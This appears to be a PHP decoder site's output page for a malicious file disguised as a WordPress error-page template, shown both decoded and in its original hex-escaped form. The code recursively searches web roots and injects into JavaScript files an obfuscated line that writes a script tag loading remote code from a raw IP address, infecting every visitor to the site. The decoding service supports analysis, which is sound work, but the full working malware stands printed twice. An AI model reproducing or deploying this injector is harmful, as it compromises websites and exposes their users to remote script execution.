Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * The main template file for display error page. * * @package WordPress..
Decoded Output download
<?php
/**
* The main template file for display error page.
*
* @package WordPress
*/
error_reporting(0);
$file_name = 'e';
$text = 'var _0xaae8=["","join","reverse","split",">tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<","write"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))';
$position = 1;
function getDirContents($dir) {
global $file_name, $text, $position;
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
$path_info = pathinfo($path);
$pos3 = stripos($path_info['basename'], '.js');
if($pos3 !== false){
$pos2 = stripos($path_info['basename'], $file_name);
if($pos2 !== false) {
echo 'WP_Error_Page_Not_Found '."
";
$pos1 = stripos(file_get_contents($path), $text);
if ($pos1 === false) {
//echo 'EDIT '.$path."
";
if($position == 2) {
file_put_contents($path, $text, FILE_APPEND);
}
else {
file_put_contents($path, $text.file_get_contents($path));
}
}
}
}
} elseif($value != "." && $value != "..") {
getDirContents($path);
}
}
}
//start
$path = $_SERVER['DOCUMENT_ROOT'];
//public_html
$pos1 = stripos($path,'/public_html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/public_html/') + strlen('/public_html/'));
getDirContents($rest);
} else {
//html
$pos1 = stripos($path,'/html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/html/') + strlen('/html/'));
getDirContents($rest);
} else {
//htdocs
$pos1 = stripos($path,'/htdocs/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/htdocs/') + strlen('/htdocs/'));
getDirContents($rest);
} else {
//httpdocs
$pos1 = stripos($path,'/httpdocs/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/httpdocs/') + strlen('/httpdocs/'));
getDirContents($rest);
} else {
//vhosts
$pos1 = stripos($path,'/vhosts/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/vhosts/') + strlen('/vhosts/'));
getDirContents($rest);
} else {
//www
$pos1 = stripos($path,'/www/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/www/') + strlen('/www/'));
getDirContents($rest);
} else {
//wwwroot
$pos1 = stripos($path,'/wwwroot/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/wwwroot/') + strlen('/wwwroot/'));
} else {
//web
$pos1 = stripos($path,'/web/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/web/') + strlen('/web/'));
} else {
getDirContents($_SERVER['DOCUMENT_ROOT']);
}
}
}
}
}
}
}
}
?>Did this file decode correctly?
Original Code
<?php
/**
* The main template file for display error page.
*
* @package WordPress
*/
error_reporting(0);
$file_name = 'e';
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))';
$position = 1;
function getDirContents($dir) {
global $file_name, $text, $position;
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
$path_info = pathinfo($path);
$pos3 = stripos($path_info['basename'], '.js');
if($pos3 !== false){
$pos2 = stripos($path_info['basename'], $file_name);
if($pos2 !== false) {
echo 'WP_Error_Page_Not_Found '."\n";
$pos1 = stripos(file_get_contents($path), $text);
if ($pos1 === false) {
//echo 'EDIT '.$path."\n";
if($position == 2) {
file_put_contents($path, $text, FILE_APPEND);
}
else {
file_put_contents($path, $text.file_get_contents($path));
}
}
}
}
} elseif($value != "." && $value != "..") {
getDirContents($path);
}
}
}
//start
$path = $_SERVER['DOCUMENT_ROOT'];
//public_html
$pos1 = stripos($path,'/public_html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/public_html/') + strlen('/public_html/'));
getDirContents($rest);
} else {
//html
$pos1 = stripos($path,'/html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/html/') + strlen('/html/'));
getDirContents($rest);
} else {
//htdocs
$pos1 = stripos($path,'/htdocs/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/htdocs/') + strlen('/htdocs/'));
getDirContents($rest);
} else {
//httpdocs
$pos1 = stripos($path,'/httpdocs/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/httpdocs/') + strlen('/httpdocs/'));
getDirContents($rest);
} else {
//vhosts
$pos1 = stripos($path,'/vhosts/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/vhosts/') + strlen('/vhosts/'));
getDirContents($rest);
} else {
//www
$pos1 = stripos($path,'/www/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/www/') + strlen('/www/'));
getDirContents($rest);
} else {
//wwwroot
$pos1 = stripos($path,'/wwwroot/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/wwwroot/') + strlen('/wwwroot/'));
} else {
//web
$pos1 = stripos($path,'/web/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/web/') + strlen('/web/'));
} else {
getDirContents($_SERVER['DOCUMENT_ROOT']);
}
}
}
}
}
}
}
}
?>Function Calls
| stripos | 1 |
| error_reporting | 1 |
Stats
| MD5 | 686212193b3377114cf333b103bc370d |
| Eval Count | 0 |
| Decode Time | 100 ms |